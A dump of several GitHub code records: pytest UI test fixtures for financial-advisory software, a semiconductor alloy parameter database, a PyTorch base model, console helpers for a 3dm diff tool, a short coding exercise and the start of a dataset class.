LogIn(config).logout()\n\n\n@pytest.fixture\ndef ui_login(config):\n LogIn(config).navigate_to_login_page().login().assert_user_logged_in()\n\n\n@pytest.fixture\ndef ui_logout_login(config):\n yield\n LogIn(config).logout()\n LogIn(config).navigate_to_login_page().login().assert_user_logged_in()\n\n\n@pytest.fixture\ndef ui_delete_needs_priorities_question(config):\n yield\n SetupNeedsAndPrioritiesQuestions(config).navigate_to_needs_questions().delete_question()\n\n\n@pytest.fixture\ndef ui_delete_needs_priorities_answer(config):\n yield\n SetupNeedsAndPrioritiesQuestions(config).open_client_by_url().go_to_fact_find()\\\n .navigate_to_needs_and_priorities_tab().clear_need_and_priorities_answer()\n\n\n@pytest.fixture\ndef ui_delete_risk_tolerance_data(config):\n yield\n SearchClient(config).open_client_by_url()\n CompleteFactFind(config).go_to_fact_find() \\\n .clear_risk_subtab_data() \\\n .clear_risk_replay_subtab_data()\n\n\n@pytest.fixture\ndef ui_delete_plan_tasks(config):\n yield\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).delete_plan_tasks()\n\n\n@pytest.fixture\ndef ui_remove_delegate_from_user_account(config):\n yield\n SearchUser(config).navigate_to_manage_users().find_user()\n SetUpUserDelegation(config).navigate_to_delegate_tab().remove_delegate_from_user_account()\n\n\n@pytest.fixture\ndef ui_remove_factfind_partner(config):\n yield\n CompleteFactFind(config).go_to_fact_find().using_add_remove_partner_wizard().remove_partner()\n\n\n@pytest.fixture\ndef ui_create_client_plan_fee(config):\n ProviderStatement(config).add_plan_and_plan_fee()\n\n\n@pytest.fixture\ndef ui_delete_cash_receipt(config):\n yield\n CashReceipts(config).navigate_to_cash_receipts_search().search_cash_receipt() \\\n .using_cash_receipt_matching_dialog().unmatch_fee().search_cash_receipt().delete_cash_receipt()\n\n\n@pytest.fixture\ndef ui_move_fee_to_cancelled_status(config):\n yield\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"fee_data\"][\"fee_cancelled_status\"])\n\n\n@pytest.fixture\ndef ui_move_fee_to_due_status(config):\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"fee_data\"][\"fee_due_status\"])\n\n\n@pytest.fixture\ndef ui_delete_statements_on_first_page(config):\n ProviderStatement(config).navigate_to_statement_search().search_statement()\n if StatementSearchPage(config).get_statement_count_on_first_page():\n StatementSearchPage(config).select_result_per_page(\"250\")\n statement_count = StatementSearchPage(config).get_statement_count_on_first_page()\n while statement_count > 0:\n ProviderStatement(config).delete_statements()\n StatementSearchPage(config).click_search()\n statement_count -= 1\n yield\n ProviderStatement(config).navigate_to_statement_search().search_statement()\n if StatementSearchPage(config).get_statement_count_on_first_page():\n StatementSearchPage(config).select_result_per_page(\"250\")\n statement_count = StatementSearchPage(config).get_statement_count_on_first_page()\n while statement_count > 0:\n ProviderStatement(config).delete_statements()\n StatementSearchPage(config).click_search()\n statement_count -= 1\n\n\n@pytest.fixture\ndef ui_delete_live_statements(config):\n yield\n ElectronicImports(config).delete_live_statements()\n\n\n@pytest.fixture\ndef ui_delete_imported_statement(config):\n yield\n ElectronicImports(config).delete_imported_statement()\n\n\n@pytest.fixture\ndef ui_delete_client_open_activities(config):\n yield\n SearchClient(config).open_client_by_url()\n ClientActivities(config).navigate_to_client_open_activities().delete_client_open_activities()\n\n\n@pytest.fixture\ndef ui_delete_user_open_tasks(config):\n yield\n UserTasks(config).navigate_to_organiser().delete_user_open_tasks()\n\n\n@pytest.fixture\ndef ui_move_fee_to_draft_status(config):\n yield\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"fee_data\"][\"fee_draft_status\"])\n\n\n@pytest.fixture\ndef ui_logout(config):\n yield\n LogIn(config).logout().assert_user_logged_out()\n\n\n@pytest.fixture\ndef ui_clear_document_queue(config):\n yield\n SearchClient(config).open_client_by_url()\n GenerateDocument(config).open_document_queue().clear_document_queue()\n\n\n@pytest.fixture\ndef ui_add_plan_to_wrapper(config):\n SearchPlan(config).open_plan_by_url(get_temp_data(config, 'client')['id'], get_temp_data(config, \"plan\", 1)[\"id\"])\n PlanActions(config).using_add_to_wrapper_dialog().add_plan_to_wrapper()\n\n\n@pytest.fixture\ndef ui_add_plan_report_note(config):\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).add_wrap_report_notes()\n\n\n@pytest.fixture\ndef ui_delete_plans_valuations(config):\n yield\n plans_list = utils.get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n SearchPlan(config).open_plan_by_url(get_temp_data(config, 'client')['id'], plan[\"id\"])\n PlanActions(config).delete_valuations()\n\n\n@pytest.fixture\ndef ui_delete_plan_valuations(config):\n yield\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).delete_valuations()\n\n\n@pytest.fixture\ndef ui_delete_funds(config):\n yield\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).delete_funds()\n\n\n@pytest.fixture\ndef ui_delete_funds_for_all_plans(config):\n yield\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n SearchPlan(config).open_plan_by_url(plan[\"owners\"][0][\"id\"], plan[\"id\"])\n PlanActions(config).delete_funds()\n\n\n@pytest.fixture\ndef ui_delete_funds_for_sub_plan(config):\n yield\n SearchPlan(config).open_plan_by_url(get_temp_data(config, 'client')['id'], get_temp_data(config, \"plan\", 1)[\"id\"])\n PlanActions(config).delete_funds()\n\n\n@pytest.fixture\ndef ui_create_delete_binder(config):\n ClientDocuments(config).open_client_by_url().open_client_binders().create_binder()\n yield\n ClientDocuments(config).open_client_by_url().open_client_binders().delete_binder()\n\n\n@pytest.fixture\ndef ui_delete_quote(config):\n yield\n GetClientQuote(config).open_client_by_url().navigate_to_quotes_and_apps().delete_quote()\n\n\n@pytest.fixture\ndef ui_add_delete_opportunity(config):\n SearchClient(config).open_client_by_url()\n ClientOpportunities(config).add_opportunity()\n yield\n SearchClient(config).open_client_by_url()\n ClientOpportunities(config).navigate_to_opportunities().open_opportunity().delete_opportunity()\n\n\n@pytest.fixture\ndef ui_delete_service_case(config):\n yield\n SearchClient(config).open_client_by_url()\n ClientServiceCase(config).navigate_to_service_cases().open_service_case().delete_service_case()\n\n\n@pytest.fixture\ndef ui_delete_service_case_for_all_clients(config):\n yield\n clients_list = utils.get_temp_data_collection(config, \"client\")\n for client in clients_list:\n SearchClient(config).open_client_by_url(client[\"id\"])\n ClientServiceCase(config).navigate_to_service_cases().open_service_case().delete_service_case()\n\n\n\n@pytest.fixture\ndef ui_delete_recommendations(config):\n yield\n SearchClient(config).open_client_by_url()\n PlanningOpportunities(config).using_planning_opportunities().open_recommendations()\\\n .using_delete_recommendations_dialog().delete_all_recommendations()\n\n\n@pytest.fixture\ndef ui_delete_lead_tasks(config):\n yield\n AddLeadTask(config).open_created_lead_by_url()\\\n .navigate_to_lead_task_and_appts()\\\n .delete_all_lead_tasks()\n\n\n@pytest.fixture\ndef ui_add_imps_manual_recommendation(config):\n PlanningOpportunities(config).open_client_by_url()\\\n .using_planning_opportunities()\\\n .open_recommendations()\\\n .using_add_manual_rec_dialog()\\\n .add_switch_recommendation_details()\\\n .add_model_portfolio(\"Automation Test iMPS Model\")\\\n .save_recommendation()\n\n\n@pytest.fixture\ndef ui_start_rebalance_communication_process(config):\n StartRebalanceCommunication(config).using_rebalance_communication_options_dialog()\\\n .start_rebalance_communication()\n LogIn(config).logout()\n\n# \n\n# \n\n\n@pytest.fixture\ndef file_delete_system_based_template(config):\n yield\n remove_file(config, config.file_path)\n\n\n@pytest.fixture\ndef file_delete_portfolio_reports(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"portfolio_report_data\"][\"pdf_name\"]))\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"portfolio_report_data\"][\"word_name\"]))\n\n\n@pytest.fixture\ndef file_delete_test_automation_document(config):\n yield\n remove_file(config, get_file_path(config, \"Test Automation Document.pdf\"))\n\n\n@pytest.fixture\ndef file_delete_mi_reports(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"mi_report_data\"][\"pdf_name\"]))\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"mi_report_data\"][\"csv_name\"]))\n\n\n@pytest.fixture\ndef file_reset_import_statement_file_1_name(config):\n yield\n ElectronicImports(config).reset_import_statement_file_name(\"csv_file_1\")\n\n\n@pytest.fixture\ndef file_reset_import_statement_file_2_name(config):\n yield\n ElectronicImports(config).reset_import_statement_file_name(\"csv_file_2\")\n\n\n@pytest.fixture\ndef file_delete_import_statement(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"provider_statement_data\"][\"xls_name\"]))\n\n\n@pytest.fixture\ndef file_delete_fact_find_pdf(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"fact_find_data\"][\"pdf_name\"]))\n\n\n@pytest.fixture\ndef file_delete_leads_import_csv(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"lead_data\"][\"leads_import_file_name\"]))\n\n\n@pytest.fixture\ndef file_delete_client_data_file(config):\n yield\n remove_file(config, get_file_path(config, get_common_data(config)[\"test_data\"][\"fact_find_data\"][\"client_data_file_name\"]))\n\n\n@pytest.fixture\ndef file_delete_quote_document_pdf(config):\n yield\n remove_file(config, get_file_path(config, get_api_data(config, \"create_quote_document\")[\"object\"][\"original_filename\"]))\n\n\n@pytest.fixture\ndef file_delete_quote_result_document_pdf(config):\n yield\n remove_file(config, get_file_path(config, get_api_data(config, \"create_quote_document\")[\"object\"][\"original_filename\"]))\n\n\n# \n\n# ","repo_name":"intelliflovrk/raj_test_io","sub_path":"userjourneys/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":33316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40299310228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module provides an enum for better dealing with alloys names\nand a database with alloys properties\n\"\"\"\n\nfrom enum import Enum\n\nclass Alloy(Enum):\n \"\"\"\n An enum for labeling some alloys of interest\n \n Alloys under support currently are:\n - GaAs\n - AlAs\n - InAs\n - InP\n - GaP\n - AlGaAs\n - InGaAs\n - AlInAs\n \"\"\"\n GaAs = 1\n AlAs = 2\n InAs = 3\n InP = 4\n GaP = 5\n AlGaAs = 6 # Al(x)Ga(1-x)As\n InGaAs = 7 # In(1-x)Ga(x)As\n AlInAs = 8 # Al(x)In(1-x)As\n\nclass Database:\n \"\"\"\n This class provides parameters, deformation, and effective masses\n for some selected alloys, it is currently based on:\n\n Chuang, S. L. (1995). Physics of optoelectronic devices. New York: Wiley.\n Appendix K: tables K.2 and K.3\n \"\"\"\n\n def __init__(self, alloy, concentration=1.0):\n \"\"\"\n An instance of this class represents a single alloy, which must be\n informed in this constructor\n\n Parameters\n ----------\n alloy : Alloy\n the alloy which the instance is going to represent\n concentration : float\n some alloys have characteristic ratios between components, they\n are usually pointed as `x`\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> print(\"Gap at 0K - %.2f eV\" % algaas_03.parameters('eg_0'))\n Gap at 0K - 2.00 eV\n \"\"\"\n self.alloy = alloy\n self.concentration = concentration\n\n # this is the default (currently the only one) source\n self.chuang_db = {\n Alloy.GaAs: {\n 'parameters': {\n 'a0': 5.6533,\n 'eg_0': 1.519,\n 'eg_300': 1.424,\n 'eg_0_ind': None,\n 'eg_300_ind': None,\n 'delta': 0.34,\n 'ev_av': -6.92,\n 'optical_matrix': 25.7,\n 'parameter_ep': 25.0\n },\n 'deformation_potentials': {\n 'a_c': -7.17,\n 'a_v': 1.16,\n 'a': -8.33,\n 'b': -1.7,\n 'd': -4.55,\n 'c11': 11.879,\n 'c12': 5.376,\n 'c44': 5.94\n },\n 'effective_masses': {\n 'm_e': 0.067,\n 'm_hh': 0.5,\n 'm_lh': 0.087,\n 'm_hh_z': 0.333,\n 'm_lh_z': 0.094,\n 'gamma_1': 6.8,\n 'gamma_2': 1.9,\n 'gamma_3': 2.73,\n }\n },\n Alloy.AlAs: {\n 'parameters': {\n 'a0': 5.66,\n 'eg_0': 3.13,\n 'eg_300': 3.03,\n 'eg_0_ind': 2.229,\n 'eg_300_ind': 2.168,\n 'delta': 0.28,\n 'ev_av': -7.49,\n 'optical_matrix': 21.1,\n 'parameter_ep': None\n },\n 'deformation_potentials': {\n 'a_c': -5.64,\n 'a_v': 2.47,\n 'a': -8.11,\n 'b': -1.5,\n 'd': -3.4,\n 'c11': 12.5,\n 'c12': 5.34,\n 'c44': 5.42\n },\n 'effective_masses': {\n 'm_e': 0.15,\n 'm_hh': 0.79,\n 'm_lh': 0.15,\n 'm_hh_z': 0.478,\n 'm_lh_z': 0.208,\n 'gamma_1': 3.45,\n 'gamma_2': 0.68,\n 'gamma_3': 1.29,\n }\n },\n Alloy.InAs: {\n 'parameters': {\n 'a0': 6.0584,\n 'eg_0': 0.42,\n 'eg_300': 0.354,\n 'eg_0_ind': None,\n 'eg_300_ind': None,\n 'delta': 0.38,\n 'ev_av': -6.67,\n 'optical_matrix': 22.2,\n 'parameter_ep': None\n },\n 'deformation_potentials': {\n 'a_c': -5.08,\n 'a_v': 1.0,\n 'a': -6.08,\n 'b': -1.8,\n 'd': -3.6,\n 'c11': 8.329,\n 'c12': 4.526,\n 'c44': 3.96\n },\n 'effective_masses': {\n 'm_e': 0.023,\n 'm_hh': 0.4,\n 'm_lh': 0.026,\n 'm_hh_z': 0.0263,\n 'm_lh_z': 0.027,\n 'gamma_1': 20.4,\n 'gamma_2': 8.3,\n 'gamma_3': 9.1,\n }\n },\n Alloy.InP: {\n 'parameters': {\n 'a0': 5.8688,\n 'eg_0': 1.424,\n 'eg_300': 1.344,\n 'eg_0_ind': None,\n 'eg_300_ind': None,\n 'delta': 0.11,\n 'ev_av': -7.04,\n 'optical_matrix': 20.7,\n 'parameter_ep': 16.7\n },\n 'deformation_potentials': {\n 'a_c': -5.04,\n 'a_v': 1.27,\n 'a': -6.31,\n 'b': -1.7,\n 'd': -5.6,\n 'c11': 10.11,\n 'c12': 5.61,\n 'c44': 4.56\n },\n 'effective_masses': {\n 'm_e': 0.077,\n 'm_hh': 0.6,\n 'm_lh': 0.12,\n 'm_hh_z': 0.606,\n 'm_lh_z': 0.121,\n 'gamma_1': 4.95,\n 'gamma_2': 1.65,\n 'gamma_3': 2.35,\n }\n },\n Alloy.GaP: {\n 'parameters': {\n 'a0': 5.4505,\n 'eg_0': 2.78,\n 'eg_300': 1.344,\n 'eg_0_ind': 2.35,\n 'eg_300_ind': 2.27,\n 'delta': 0.08,\n 'ev_av': -7.4,\n 'optical_matrix': 22.2,\n 'parameter_ep': None\n },\n 'deformation_potentials': {\n 'a_c': -7.14,\n 'a_v': 1.70,\n 'a': -8.83,\n 'b': -1.8,\n 'd': -4.5,\n 'c11': 14.05,\n 'c12': 6.203,\n 'c44': 7.033\n },\n 'effective_masses': {\n 'm_e': 0.25,\n 'm_hh': 0.67,\n 'm_lh': 0.17,\n 'm_hh_z': 0.326,\n 'm_lh_z': 0.199,\n 'gamma_1': 4.05,\n 'gamma_2': 0.49,\n 'gamma_3': 1.25,\n }\n },\n }\n\n # specify a dummy order for some known ternary alloys\n self.ternary_order = {\n Alloy.AlGaAs: (Alloy.AlAs, Alloy.GaAs),\n Alloy.InGaAs: (Alloy.GaAs, Alloy.InAs),\n Alloy.AlInAs: (Alloy.AlAs, Alloy.InAs)\n }\n\n # P(A(x)B(1-x)C) = x P(AC) + (1-x) P(BC)\n if self.alloy in self.ternary_order:\n alloy_1, alloy_2 = self.ternary_order[self.alloy]\n self.chuang_db[self.alloy] = {}\n for property_type in self.chuang_db[alloy_1].keys():\n property_values = {}\n for property_name in \\\n self.chuang_db[alloy_1][property_type].keys():\n value_alloy_1 = \\\n self.chuang_db[alloy_1][property_type][property_name]\n value_alloy_2 = \\\n self.chuang_db[alloy_2][property_type][property_name]\n property_values[property_name] = \\\n (value_alloy_1 and value_alloy_2 and \\\n concentration*value_alloy_1+\\\n (1.0-concentration)*value_alloy_2) or None\n self.chuang_db[self.alloy][property_type] = property_values\n\n def alloy_property(self, property_type, property_name):\n \"\"\"\n this is just a shortcut for accessing the database\n\n Parameters\n ----------\n property_type : string\n the property type as in the database, possible values are:\n - `parameters`\n - `deformation_potentials`\n - `effective_masses`\n property_name : string\n the property name as in the database, example values are:\n - `eg_0`\n - `a_c`\n\n Returns\n -------\n property : float\n the value of the property\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> gap = algaas_03.alloy_property('parameters', 'eg_0')\n >>> print(\"Gap at 0K - %.2f eV\" % gap)\n Gap at 0K - 2.00 eV\n \"\"\"\n return self.chuang_db[self.alloy][property_type][property_name]\n\n def parameters(self, parameter_name):\n \"\"\"\n this is just a shortcut for using `alloy_property` method above\n\n Parameters\n ----------\n property_name : string\n the property name as in the database, example values are:\n - `eg_0`\n - `eg_300`\n\n Returns\n -------\n property : float\n the value of the parameter\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> print(\"Gap at 0K - %.2f eV\" % algaas_03.parameters('eg_0'))\n Gap at 0K - 2.00 eV\n \"\"\"\n return self.alloy_property('parameters', parameter_name)\n\n def deformation_potentials(self, parameter_name):\n \"\"\"\n this is just a shortcut for using `alloy_property` method above\n\n Parameters\n ----------\n property_name : string\n the property name as in the database, example values are:\n - `a_c`\n - `a_v`\n\n Returns\n -------\n property : float\n the value of the deformation parameters\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> a_v = algaas_03.deformation_potentials('a_v')\n >>> print(\"Valence defformation potencial - %.2f eV\" % a_v)\n Valence defformation potencial - 1.55 eV\n \"\"\"\n return self.alloy_property('deformation_potentials', parameter_name)\n\n def effective_masses(self, parameter_name):\n \"\"\"\n this is just a shortcut for using `alloy_property` method above\n\n Parameters\n ----------\n property_name : string\n the property name as in the database, example values are:\n - `m_e`\n - `m_hh`\n\n Returns\n -------\n property : float\n the value of the effective mass\n\n Examples\n --------\n >>> from band_structure_database import Alloy, Database\n >>> algaas_03 = Database(Alloy.AlGaAs, 0.3)\n >>> m_e = algaas_03.effective_masses('m_e')\n >>> print(\"Electron effective mass - %.3f\" % m_e)\n Electron effective mass - 0.092\n \"\"\"\n return self.alloy_property('effective_masses', parameter_name)\n","repo_name":"thiagolcmelo/time-evolution","sub_path":"band_structure_database.py","file_name":"band_structure_database.py","file_ext":"py","file_size_in_byte":11785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36172481698","text":"\"\"\"\nBase model defining the training procedure and some common methods for SAEs\n\n\"\"\"\n__date__ = \"June - July 2022\"\n\n\nimport numpy as np\nfrom sklearn.utils.validation import check_is_fitted\nimport torch\nfrom torch.utils.data import TensorDataset, DataLoader\nimport warnings\n\nfrom .. import __commit__ as LPNE_COMMIT\nfrom .. import __version__ as LPNE_VERSION\nfrom .. import INVALID_LABEL\nfrom ..utils.utils import get_weights\n\n\nFLOAT = torch.float32\nINT = torch.int64\n\n\nclass BaseModel(torch.nn.Module):\n def __init__(self, n_iter=50000, batch_size=256, lr=1e-3, device=\"auto\"):\n \"\"\"\n\n Parameters\n ----------\n n_iter : int, optional\n Number of epochs to train\n batch_size : int, optional\n DataLoader batch size\n lr : float, optional\n Learning rate\n device : str, optional\n Pytorch device\n \"\"\"\n super(BaseModel, self).__init__()\n self.n_iter = n_iter\n self.batch_size = batch_size\n self.lr = lr\n self.device = device\n if self.device == \"auto\":\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.classes_ = None\n self.groups_ = None\n\n def _initialize(self):\n self.n_groups = len(self.groups_)\n self.n_classes = len(self.classes_)\n self.to(self.device)\n self.iter_ = 1\n\n def fit(\n self,\n features,\n labels,\n groups=None,\n print_freq=5,\n score_freq=20,\n random_state=None,\n ):\n \"\"\"\n Train the model on the given dataset.\n\n Parameters\n ----------\n features : numpy.ndarray\n Shape: [b,f,r,r]\n labels : numpy.ndarray\n Shape: [b]\n groups : None or numpy.ndarray\n Shape: [b]\n print_freq : int or None, optional\n Print loss every ``print_freq`` epochs.\n score_freq : int or None, optional\n Print weighted accuracy every ``score_freq`` epochs.\n random_state : int or None, optional\n A random seed for training. If ``None``, then no seed is set.\n\n Returns\n -------\n self : BaseModel\n The fitted model\n \"\"\"\n # Check arguments.\n assert features.ndim == 4\n assert labels.ndim == 1\n assert groups.ndim == 1\n assert len(features) == len(labels) and len(labels) == len(groups)\n # Remove missing data.\n axes = tuple(i for i in range(1, features.ndim))\n idx = np.argwhere(np.isnan(features).sum(axis=axes) == 0).flatten()\n features = features[idx]\n labels = labels[idx]\n if groups is not None:\n groups = groups[idx]\n # Initialize weights, groups, and labels.\n weights = get_weights(labels, groups, invalid_label=INVALID_LABEL)\n idx = np.argwhere(labels == INVALID_LABEL).flatten()\n idx_comp = np.argwhere(labels != INVALID_LABEL).flatten()\n # Mask the labels temporarily, get the classes, and unmask.\n temp_label = np.unique(labels[labels != INVALID_LABEL])[0]\n labels[idx] = temp_label\n self.classes_, labels = np.unique(labels, return_inverse=True)\n labels[idx] = INVALID_LABEL\n assert len(self.classes_) > 1\n # Figure out the groups.\n if groups is None:\n groups = np.zeros(len(features))\n np_groups = np.copy(groups)\n self.groups_, groups = np.unique(groups, return_inverse=True)\n np_labels = np.copy(labels)\n # Set the random seed if one is given.\n if random_state is not None:\n torch.manual_seed(random_state)\n # Initialize the parameters.\n self.features_shape_ = features.shape\n self._initialize()\n # NumPy arrays to PyTorch tensors.\n features = torch.tensor(features, dtype=FLOAT).to(self.device)\n labels = torch.tensor(labels, dtype=INT).to(self.device)\n groups = torch.tensor(groups, dtype=INT).to(self.device)\n weights = torch.tensor(weights, dtype=FLOAT).to(self.device)\n # Make a Dataset, a DataLoader, and an optimizer.\n dset = TensorDataset(features, labels, groups, weights)\n loader = DataLoader(dset, batch_size=self.batch_size, shuffle=True)\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n # Train.\n while self.iter_ <= self.n_iter:\n i_loss = 0.0\n for batch in loader:\n self.zero_grad()\n loss = self(*batch)\n i_loss += loss.item()\n loss.backward()\n optimizer.step()\n if print_freq is not None and self.iter_ % print_freq == 0:\n print(f\"iter {self.iter_:04d}, loss: {i_loss:.3f}\")\n if score_freq is not None and self.iter_ % score_freq == 0:\n weighted_acc = self.score(\n features[idx_comp],\n np_labels[idx_comp],\n np_groups[idx_comp],\n )\n print(f\"iter {self.iter_:04d}, acc: {weighted_acc:.3f}\")\n self.iter_ += 1\n return self\n\n @torch.no_grad()\n def reconstruct(self, features):\n \"\"\"\n Reconstruct the features by sending them round trip through the model.\n\n Parameters\n ----------\n features : numpy.ndarray\n Shape: ``[b,x]`` or ``[b,f,r,r]``\n\n Returns\n -------\n rec_features : numpy.ndarray\n Shape: same as ``features``\n \"\"\"\n check_is_fitted(self, attributes=self.FIT_ATTRIBUTES)\n assert features.ndim in [2, 4]\n flag = features.ndim == 4\n if flag:\n assert features.shape[2] == features.shape[3]\n orig_shape = features.shape\n features = features.reshape(len(features), -1)\n rec_features = []\n i = 0\n while i <= len(features):\n batch_f = features[i : i + self.batch_size]\n batch_f = torch.tensor(batch_f).to(self.device, FLOAT)\n batch_zs = self.get_latents(batch_f)\n batch_rec = self.project_latents(batch_zs)\n rec_features.append(batch_rec.cpu())\n i += self.batch_size\n rec_features = torch.cat(rec_features, dim=0).numpy()\n if flag:\n return rec_features.reshape(orig_shape)\n return rec_features\n\n def get_params(self, deep=True):\n \"\"\"Get the parameters of this estimator.\"\"\"\n params = dict(\n batch_size=self.batch_size,\n lr=self.lr,\n device=self.device,\n model_name=self.MODEL_NAME,\n __commit__=LPNE_COMMIT,\n __version__=LPNE_VERSION,\n )\n try:\n params[\"classes_\"] = self.classes_\n params[\"groups_\"] = self.groups_\n params[\"iter_\"] = self.iter_\n params[\"features_shape_\"] = self.features_shape_\n except:\n pass\n if deep:\n state_dict = self.state_dict()\n if len(state_dict) > 0:\n for key in state_dict:\n state_dict[key] = state_dict[key].to(\"cpu\")\n params[\"state_dict\"] = state_dict\n try:\n params[\"optimizer_state_dict\"] = self.optimizer_.state_dict()\n except:\n pass\n return params\n\n def set_params(\n self,\n batch_size=None,\n lr=None,\n n_iter=None,\n device=None,\n classes_=None,\n groups_=None,\n iter_=None,\n features_shape_=None,\n state_dict=None,\n optimizer_state_dict=None,\n **kwargs,\n ):\n \"\"\"Set the parameters of this estimator.\"\"\"\n if batch_size is not None:\n self.batch_size = batch_size\n if lr is not None:\n self.lr = lr\n if n_iter is not None:\n self.n_iter = n_iter\n if device is not None:\n if (not torch.cuda.is_available()) and device != \"cpu\":\n warnings.warn(\"Loading GPU-trained model as a CPU model.\")\n self.device = \"cpu\"\n else:\n self.device = device\n if features_shape_ is not None:\n self.features_shape_ = features_shape_\n if classes_ is not None:\n self.classes_ = classes_\n if groups_ is not None:\n self.groups_ = groups_\n if iter_ is not None:\n self.iter_ = iter_\n if state_dict is not None or optimizer_state_dict is not None:\n self._initialize()\n if state_dict is not None:\n self.load_state_dict(state_dict)\n if optimizer_state_dict is not None:\n self.optimizer_.load_state_dict(optimizer_state_dict)\n return self\n\n @torch.no_grad()\n def save_state(self, fn):\n \"\"\"Save parameters for this estimator.\"\"\"\n params = self.get_params(deep=True)\n np.save(fn, params)\n\n @torch.no_grad()\n def load_state(self, fn):\n \"\"\"Load and set the parameters for this estimator.\"\"\"\n d = np.load(fn, allow_pickle=True).item()\n if \"model_name\" in d:\n model_name_1 = d[\"model_name\"].lower().replace(\" \", \"\").replace(\"_\", \"\")\n model_name_2 = self.MODEL_NAME.lower().replace(\" \", \"\").replace(\"_\", \"\")\n assert (\n model_name_1 == model_name_2\n ), f\"Expected {self.MODEL_NAME}, found {d['model_name']}\"\n else:\n warnings.warn(\"Didn't find field model_name when loading model.\")\n self.set_params(**d)\n\n\nif __name__ == \"__main__\":\n pass\n\n\n###\n","repo_name":"carlson-lab/lpne","sub_path":"lpne/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":9650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32149831568","text":"from argparse import ArgumentParser\nfrom sys import exit, stderr\nfrom colorama import Fore, Style\nfrom ..abstractmodel import Session\n\n\ndef print_version(programName):\n import importlib.metadata\n\n version = importlib.metadata.version(\"3dmdiff\")\n print(f\"{programName} {version}\")\n # v2 = importlib.metadata.version(\"rhino3dm\")\n exit()\n\n\ndef checkForArgument(*names, help=None) -> tuple[ArgumentParser, bool]:\n parser = ArgumentParser(add_help=False)\n flag = parser.add_argument(*names, action=\"store_true\", help=help)\n args, _ = parser.parse_known_args()\n return parser, vars(args)[flag.dest]\n\n\ndef checkForVersionArgument(programName) -> ArgumentParser:\n parser, hasVersionArg = checkForArgument(\n \"-v\", \"--version\", help=\"output version info and exit\"\n )\n if hasVersionArg:\n print_version(programName)\n return parser\n\n\nclass ConsoleSession(Session):\n def __init__(self):\n self._componentType = None\n self._componentID = None\n self._property = None\n\n def setContext(self, componentType, componentID, property):\n self._componentType = componentType\n self._componentID = componentID\n self._property = property\n\n def _context(self):\n if self._componentType:\n ctx = \" in \"\n if self._property:\n ctx += f\"{self._property} property of \"\n ctx += f\"{self._componentType} {self._componentID}\"\n return ctx\n return \"\"\n\n def ask(self, question: str) -> bool:\n pass\n\n def warn(self, message: str) -> None:\n print(\n Fore.YELLOW + \"Warning: \" + message + self._context() + Style.RESET_ALL,\n file=stderr,\n )\n\n def fatal(self, message: str) -> None:\n print(\n Fore.RED + \"Fatal error: \" + message + self._context() + Style.RESET_ALL,\n file=stderr,\n )\n exit(1)\n\n\n# class InteractiveConsoleSession(ConsoleSession)\n","repo_name":"coditect/opennurbs-diffutils","sub_path":"src/opennurbs_diffutils/cmd/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19543501742","text":"def solution(X, Y):\n compare = [str(i) for i in range(9,-1,-1)]\n answer = ''\n \n for i in compare:\n answer += i*min(X.count(i), Y.count(i))\n \n if len(answer) != 0:\n if answer.count('0') == len(answer):\n answer = '0'\n return answer\n else:\n return \"-1\"\n\nprint(f'test1 = {solution(\"100\",\"2345\")}')\nprint(f'test2 = {solution(\"100\",\"203045\")}')\nprint(f'test3 = {solution(\"100\",\"123450\")}')\nprint(f'test4 = {solution(\"12321\",\"42531\")}')\nprint(f'test5 = {solution(\"5525\",\"1255\")}')","repo_name":"Ji-Hwan-Jung/coding-test","sub_path":"level1/숫자 짝꿍.py","file_name":"숫자 짝꿍.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42107538992","text":"import os\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\n\n\nclass PileogramDataset(Dataset):\n\n def __init__(self, dir_repeats, dir_chimeric, dir_normal, dir_junk, transform=None):\n self.path_list = []\n self.label_list = []\n self.transform = transform\n\n for file in os.listdir(dir_repeats):\n 